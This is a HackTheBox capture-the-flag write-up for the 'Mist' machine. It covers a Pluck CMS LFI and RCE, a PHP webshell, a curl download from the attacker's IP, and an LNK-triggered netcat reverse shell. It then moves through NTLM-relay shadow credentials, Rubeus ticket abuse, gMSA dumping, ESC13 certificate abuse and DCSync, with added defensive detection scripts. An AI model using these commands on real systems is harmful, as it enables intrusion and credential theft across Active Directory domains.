HackTheBox — Mist

13 min read · Oct 28, 2024

Mist is an Insane-difficulty machine. It involved an instance of Pluck vulnerable to both local file inclusion (LFI) and remote code execution (RCE), uploading a PHP shell into a Defender-excluded directory so it would not be flagged, enumerating the filesystem to escalate privileges through LNK files, pivoting into the internal network with ligolo-ng to reach DC01, performing shadow credentials via NTLM relay over HTTP (since SMB signing was enabled) on MS01, enumerating the filesystem again as administrator to find a KeePass file with credentials for an account that had ReadGMSAPassword, performing shadow credentials again on a domain user, and finally escalating to domain admin through ESC13 abuse.

Nmap scan report for 10.10.11.17
Host is up (0.30s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-generator: pluck 4.7.18
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set

From the scan only port 80 is open; visiting the web server, we find Pluck hosted there.

On trying to log in, we see the version being disclosed.

This version is vulnerable to authenticated remote code execution, but currently we don't have any credentials.

Trying default credentials like password and admin:admin didn't work. Fuzzing for files reveals a cgi-bin directory, which might expose something here.

Fuzzing this directory again for .pl files, we find printenv.pl.

This file lists some XAMPP configuration, including a username: svc_web.

Getting admin access through Local File Inclusion (LFI)

Checking the GitHub issues for Pluck CMS, there seems to be an LFI on /data/modules/albums/albums_getimage.php?image=

On trying to read /etc/passwd, the application detected the ../ sequence.

We can, however, view the albums on Pluck CMS as shown in the LFI PoC, which lets us list the contents of the albums directory, revealing admin_backup.php.

This file can be read by simply passing admin_backup.php to the image parameter.
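
As an added detection example (not part of the original writeup), the following Python flags access-log requests to the vulnerable albums_getimage.php endpoint whose image parameter carries traversal sequences or a non-image filename such as admin_backup.php; the log lines are constructed, not taken from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache access-log lines mirroring the requests described above
# (normal album image, filtered traversal, double-encoded traversal,
# admin_backup.php read, and a later webshell hit); IPs, timestamps and
# sizes are made up.
SAMPLE_LOG = """\
10.10.16.17 - - [28/Oct/2024:10:01:02 +0000] "GET /data/modules/albums/albums_getimage.php?image=holiday.jpg HTTP/1.1" 200 5120
10.10.16.17 - - [28/Oct/2024:10:01:09 +0000] "GET /data/modules/albums/albums_getimage.php?image=../../../../etc/passwd HTTP/1.1" 403 210
10.10.16.17 - - [28/Oct/2024:10:01:15 +0000] "GET /data/modules/albums/albums_getimage.php?image=%252e%252e%252fsettings.php HTTP/1.1" 403 210
10.10.16.17 - - [28/Oct/2024:10:01:33 +0000] "GET /data/modules/albums/albums_getimage.php?image=admin_backup.php HTTP/1.1" 200 1337
10.10.16.17 - - [28/Oct/2024:10:05:41 +0000] "GET /uwu.php?cmd=whoami HTTP/1.1" 200 42
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp|webp)$", re.I)

def suspicious_album_requests(log_text):
    """Flag albums_getimage.php requests whose image parameter is not a plain
    image filename. Returns (timestamp, ip, decoded image value, status, reason).
    The parameter is percent-decoded a second time so double-encoded traversal
    ("%252e%252e") is caught as well."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if not url.path.lower().endswith("/albums/albums_getimage.php"):
            continue
        image = unquote(parse_qs(url.query).get("image", [""])[0])
        if ".." in image or "/" in image or "\\" in image:
            reason = "path traversal in image parameter"
        elif not IMAGE_EXT.search(image):
            reason = "non-image file requested through image parameter"
        else:
            continue
        hits.append((m["ts"], m["ip"], image, int(m["status"]), reason))
    return hits
```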

Having the admin hash, we can attempt to crack it with hashcat using mode 1700, which is raw SHA-512.

hashcat -a 0 -m 1700  ./admin_hash.txt /usr/share/wordlists/rockyou.txt --force
With this password we can log in as admin on Pluck.

Gaining a shell as svc_web

Now we can use the RCE exploit mentioned earlier: upload a module by zipping a PHP file that passes a GET parameter into the system function to execute commands.

<?php system($_GET['cmd']); ?>
But this file gets deleted within 1–2 minutes, so there is probably a cleanup script or Defender removing these files. To get a shell, upload and execute netcat to obtain a reverse shell as svc_web.

Again, as soon as the PHP file gets removed, our shell dies.

What we can do here is upload a PHP file into a directory on Defender's exclusion list, where it won't delete malicious files. Checking the permissions of C:\xampp, we have write access on this directory, so we can upload a PHP file there and then get a shell.

<?php system('curl http://10.10.16.17/uwu.php -o C:/xampp/htdocs/uwu.php'); ?>
Checking the privileges of this local user, it doesn't seem to have any that could lead to local admin.

Running arp -a to see the hosts on the network, we get one IP, 192.168.100.100, which seems to be the domain controller.

To access this host from our Kali machine, we need to pivot through MS01 using ligolo-ng.

sudo ip link set ligolo up
sudo ip route add 192.168.100.0/24 dev ligolo
We can confirm that DC01 is reachable by pinging it or running nxc to check SMB.

Here I tried using the guest account to brute-force SIDs and get a list of domain users, but that account was disabled.

I also tried AS-REP roasting the two domain accounts we can see on MS01, but that failed too.

Enumerating shares with null authentication didn't yield anything either.

Moving back to MS01, we enumerate the system by uploading winPEAS into C:/xampp/htdocs/, since that directory is excluded by Defender.

Escalating Privileges (brandon.keywarp)

Brandon.keywarp is logged in on this system, so there might be tasks or files being checked by this user. There is also a Common Applications directory which is writable by local users.

This directory contains a few LNK files.

We transfer one of the LNK files to our Windows machine to edit the shortcut's target location.

Now we edit this LNK file to execute nc from C:\xampp\htdocs to get a shell.

From here we can run BloodHound to enumerate the domain.

Brandon didn't have any interesting ACLs and wasn't in any special group.

It's the same with Sharon.

But there is an Operatives group which has ReadGMSAPassword on the SVC_CA$ account.

And this group has two members, who can also PSRemote (gain a remote session through WinRM) to DC01.

Recovering brandon's NT hash

Since SMB signing is enabled on DC01, we need to relay HTTP authentication instead, which is only possible if the WebClient service is enabled. It is currently disabled, which can be checked using GetWebDAVStatus.

To enable this service, start Responder and then, from MS01, try mapping a share on the Kali machine over HTTP.

Since we have a shell as brandon, we can verify whether AD CS is installed on the DC using certutil.

Using Certify we can list the templates that are enabled; if the User template is enabled, we can request a certificate and use it to obtain brandon's NT hash.

Certify.exe request /ca:DC01.mist.htb\mist-DC01-CA /template:User /domain:mist.htb
We convert the PEM into a PFX file so it can be used to authenticate with certipy and retrieve brandon's NTLM hash.

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
certipy auth -pfx cert.pfx  -dc-ip 192.168.100.100  -username Brandon.Keywarp -domain mist.htb
Shadow Credentials Through NTLM Relay

Now that we have brandon's hash, we can use PetitPotam to coerce MS01 into authenticating over WebDAV, which performs HTTP authentication and allows a shadow credentials attack on MS01. But before that, let's verify whether we can coerce authentication over SMB; for this we need to start chisel with a SOCKS proxy.

chisel.exe client 10.10.16.43:9000 R:socks
chisel server --reverse -p 9000
For HTTP coercion, the WebClient service will be pointed at port 8080, so we need to redirect that port from MS01 to our Kali machine; this is known as port bending. For this I'll be using StreamDivert to redirect outbound traffic on port 8080 to my Kali machine on port 80.

tcp > 8080 0.0.0.0 -> 10.10.16.43 80
Running PetitPotam again, this time setting the listener to MS01.

proxychains python3 /opt/PetitPotam/PetitPotam.py -u brandon.keywarp -hashes ':hash' MS01@8080/test 192.168.100.101
This machine account's NTLM authentication can now be relayed to DC01 over LDAPS to perform shadow credentials using ntlmrelayx (make sure to turn HTTP off in responder.conf). Normally machine accounts can edit their own msDS-KeyCredentialLink attribute, but to my surprise this did not work, as it showed that some rights were missing here.

This is probably because the value is already set and for some reason we cannot overwrite this property. There is another variation of ntlmrelayx which supports both clearing and setting the value of msDS-KeyCredentialLink through an interactive LDAP shell, so we relay again, this time using that version.

Getting administrator on MS01

We now have the certificate and its password; using gettgtpkinit from PKINITtools we can retrieve the MS01$ AES key and a TGT.

The NT hash can be recovered as well, either with certipy auth or with Rubeus.

Rubeus.exe asktgt /user:MS01$ /domain:mist.htb  /certificate:./orGRT9Km.pfx /password:aCSx4xhH2ZqvYxSAseyK /getcredentials /nowrap
Impersonating the local administrator on MS01 via the HOST service

Rubeus.exe s4u /self /user:MS01$ /rc4:4A74FC05400345D580CF58AEC3E6D833 /altservice:host/ms01.mist.htb /impersonateuser:administrator /ptt /nowrap
We convert this base64 kirbi ticket into a ccache, which impacket supports.

And use wmiexec.py to get an interactive shell as administrator.

This can also be done purely from Linux.

proxychains ticketer.py -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -domain mist.htb -spn HOST/MS01.mist.htb -nthash 4A74FC05400345D580CF58AEC3E6D833 -user-id 500 Administrator
Shell as OP_Sharon

From BloodHound we saw that OP_Sharon is a member of the Operatives group, which has ReadGMSAPassword on SVC_CA$ and PSRemote on the DC, so sharon's profile on MS01 might be interesting. Checking the Documents directory, we find sharon.kdbx, which is a KeePass database file.

Reading this file requires a password.

In the Pictures directory, we have two image files.

The second image shows us a password.

The text UA7cpa[#1!_*ZX doesn't match the base64-encoded value in the image.

So we might be missing some characters that we need to recover; we create a wordlist with crunch to brute-force the last character.

Having the master password, we can open the KeePass file and get the password for sharon.

To move forward, we pivot using ligolo-ng, since proxychains is a bit slow at reaching MS01's internal ports and DC01; this means creating the ligolo interface and adding the 192.168.100.0/24 route.

Spraying this password against both sharon and op_sharon.

Since op_sharon has PSRemote on the DC, we can log in through WinRM.

To read the gMSA password, we could use the AD module, but I'll be using gMSADumper.

python3 /opt/gMSADumper/gMSADumper.py -u 'OP_SHARON.MULLARD' -p 'pass' -d mist.htb -l 192.168.100.100
Shadow credentials on SVC_CABACKUP

Now, with this account, we can take over the SVC_CABackup user, since it has AddKeyCredentialLink over it. This again means performing a shadow credentials attack, this time through pyWhisker.

python3 pywhisker.py  -u 'svc_ca$' -H 'hash' -t SVC_CABACKUP -a add  -d mist.htb --dc-ip 192.168.100.100
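
As an added detection example serving both the relay-based shadow credentials step against MS01$ above and this pyWhisker step against SVC_CABACKUP (not part of the original writeup), the following Python classifies constructed Windows Event ID 5136 records that report additions to msDS-KeyCredentialLink; the expected_writers allowlist is an assumption for environments that legitimately provision keys.

```python
import re

# Constructed events in the shape of Windows Security Event ID 5136 (directory
# service object modified); account and object names follow the writeup, the
# rest is made up. %%14674 is the 5136 OperationType for "Value Added".
SAMPLE_EVENTS = [
    {"SubjectUserName": "MS01$", "ObjectDN": "CN=MS01,CN=Computers,DC=mist,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"SubjectUserName": "svc_ca$", "ObjectDN": "CN=SVC_CABACKUP,CN=Users,DC=mist,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"SubjectUserName": "brandon.keywarp", "ObjectDN": "CN=brandon.keywarp,CN=Users,DC=mist,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"SubjectUserName": "brandon.keywarp", "ObjectDN": "CN=brandon.keywarp,CN=Users,DC=mist,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

def first_cn(dn):
    """Leading CN of a distinguished name, lower-cased ('' if absent)."""
    m = re.match(r"CN=([^,]+)", dn, re.I)
    return m.group(1).lower() if m else ""

def shadow_credential_alerts(events, expected_writers=()):
    """Flag msDS-KeyCredentialLink additions. Returns (subject, target, verdict)
    tuples; expected_writers lists accounts allowed to provision keys (assumed,
    e.g. a device-enrollment service account in a given environment)."""
    allowed = {w.lower() for w in expected_writers}
    alerts = []
    for ev in events:
        if ev["AttributeLDAPDisplayName"].lower() != "msds-keycredentiallink":
            continue
        if ev["OperationType"] != "%%14674":   # only value additions matter here
            continue
        subject = ev["SubjectUserName"].lower()
        if subject in allowed:
            continue
        target = first_cn(ev["ObjectDN"])
        if subject.endswith("$") and subject.rstrip("$") == target:
            verdict = "machine account wrote its own key (NTLM relay to LDAP pattern)"
        elif subject.rstrip("$") != target:
            verdict = "foreign principal added a key (AddKeyCredentialLink abuse)"
        else:
            verdict = "user added a key to own object (verify device enrollment)"
        alerts.append((subject, target, verdict))
    return alerts
```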
To retrieve the NT hash, we use the same steps that were performed for MS01$.

Rubeus.exe asktgt /user:SVC_CABACKUP /domain:mist.htb  /certificate:./SW9Iavcw.pfx /password:ciCdAJ1qPObnqR57ltDL /getcredentials /nowrap
Getting Domain Admin Through ESC13

Recently two new AD CS attacks were introduced, dubbed ESC13 and ESC14; from certipy's GitHub issues we can see that support for ESC13 is being added as well.

Cloning this version of certipy, we find that the certificate template ManagerAuthentication is vulnerable to ESC13.

This template has an Extended Key Usage (EKU) of Client Authentication, which means a certificate issued from it can be used for authentication; the template is linked to the Certificate Managers group, and members of Certificate Services can enroll in it.

This grants the privileges of the linked group to whoever enrolls for the certificate, without being a member of that group; this is known as ESC13. Requesting a certificate with the ManagerAuthentication template shows an error about the public key not meeting the minimum size.

By default certipy uses a 2048-bit public key; this can be changed to 4096 with the -key-size parameter.

certipy req -u 'SVC_CABACKUP' -hashes 'hash' -ca 'mist-DC01-CA' -dc-ip 192.168.100.100 -template 'ManagerAuthentication' -key-size 4096
We now have a certificate for svc_cabackup that carries the permissions of Certificate Managers, so we request a TGT with this certificate.

python3 gettgtpkinit.py -cert-pfx ./svc_cabackup.pfx -dc-ip 192.168.100.100 mist.htb/SVC_CABACKUP SVC_CABACKUP.ccache
Listing the templates again, we can see that BackupSvcAuthentication can be enrolled in by members of CA Backup, which we effectively are with the certificate we currently hold.

On requesting this certificate we again gain the privileges of a linked group, ServiceAccounts, which is a member of the Backup Operators group.
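
As an added defender-side example (not certipy's code and not from the writeup), the following Python audits constructed template and OID data for the ESC13 condition used twice above: ManagerAuthentication linked to Certificate Managers and BackupSvcAuthentication linked to ServiceAccounts. The issuance-policy OIDs are placeholders, not the real values from mist.htb.

```python
# Real input comes from LDAP: pKICertificateTemplate objects carry
# pKIExtendedKeyUsage and msPKI-Certificate-Policy, and msPKI-Enterprise-Oid
# objects under CN=OID,CN=Public Key Services expose msDS-OIDToGroupLink.
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"
SERVER_AUTH_EKU = "1.3.6.1.5.5.7.3.1"

# Constructed sample: template and group names follow the writeup; the
# issuance policy OIDs below are placeholders.
TEMPLATES = [
    {"name": "ManagerAuthentication", "ekus": [CLIENT_AUTH_EKU],
     "policies": ["1.3.6.1.4.1.311.21.8.1000.1"], "manager_approval": False,
     "enrollers": ["MIST\\Certificate Services"]},
    {"name": "BackupSvcAuthentication", "ekus": [CLIENT_AUTH_EKU],
     "policies": ["1.3.6.1.4.1.311.21.8.1000.2"], "manager_approval": False,
     "enrollers": ["MIST\\CA Backup"]},
    {"name": "User", "ekus": [CLIENT_AUTH_EKU], "policies": [],
     "manager_approval": False, "enrollers": ["MIST\\Domain Users"]},
    {"name": "WebServer", "ekus": [SERVER_AUTH_EKU],
     "policies": ["1.3.6.1.4.1.311.21.8.1000.1"], "manager_approval": False,
     "enrollers": ["MIST\\Domain Users"]},
]
OID_GROUP_LINKS = {  # issuance policy OID -> msDS-OIDToGroupLink target
    "1.3.6.1.4.1.311.21.8.1000.1": "CN=Certificate Managers,CN=Users,DC=mist,DC=htb",
    "1.3.6.1.4.1.311.21.8.1000.2": "CN=ServiceAccounts,CN=Users,DC=mist,DC=htb",
}

def find_esc13(templates, oid_links):
    """Return (template, policy OID, linked group, enrollers) for every template
    whose certificates both authenticate (Client Authentication EKU) and carry
    an issuance policy linked to a group, with no manager-approval gate. Each
    hit lets any listed enroller act as a member of that group on PKINIT logon."""
    findings = []
    for t in templates:
        if CLIENT_AUTH_EKU not in t["ekus"] or t["manager_approval"]:
            continue
        for oid in t["policies"]:
            group = oid_links.get(oid)
            if group is not None:
                findings.append((t["name"], oid, group, tuple(t["enrollers"])))
    return findings

if __name__ == "__main__":
    for name, oid, group, who in find_esc13(TEMPLATES, OID_GROUP_LINKS):
        print(f"ESC13: {name} via {oid} grants {group} to {', '.join(who)}")
```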

Being in this group, we can back up the registry hives to dump the DC's SAM hashes and machine account hash, and then perform DCSync.

certipy req -u 'SVC_CABACKUP@mist.htb' -k -no-pass -ca 'mist-DC01-CA' -dc-ip 192.168.100.100  -target DC01.mist.htb -template 'BackupSvcAuthentication' -key-size 4096
We export this TGT and start an SMB server with smbserver.py, then back up the SAM, SYSTEM and SECURITY registry hives using reg.py.

(Dumping the SYSTEM hive will take some time.) After obtaining these three files, we run secretsdump.py locally and use the $MACHINE.ACC hash to perform DCSync.


Written by ARZ101